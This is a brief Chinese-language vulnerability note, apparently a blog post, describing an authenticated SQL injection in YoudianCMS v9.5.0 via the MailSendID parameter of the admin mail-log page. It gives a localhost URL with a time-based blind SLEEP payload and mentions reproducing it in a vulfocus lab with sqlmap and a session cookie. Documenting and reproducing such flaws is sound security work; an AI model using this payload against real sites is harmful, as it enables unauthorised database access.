YoudianCMS v9.5.0 SQL 注入漏洞
通过 /App/Lib/Action/Admin/MailAction.class.php 中的 MailSendID 参数发现 YoudianCMS v9.5.0 包含 SQL 注入漏洞。
该漏洞需要登录进后台利用
漏洞路径
http://127.0.0.1/index.php/Admin/mail/viewLog?MailSendID=1
%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(1)))A)
复现
使用https://vulfocus.cn
根据提示安装数据库
该漏洞需要登录进后台
sqlmap
注意需要带上cookie
若有收获,就点个赞吧
0 人点赞
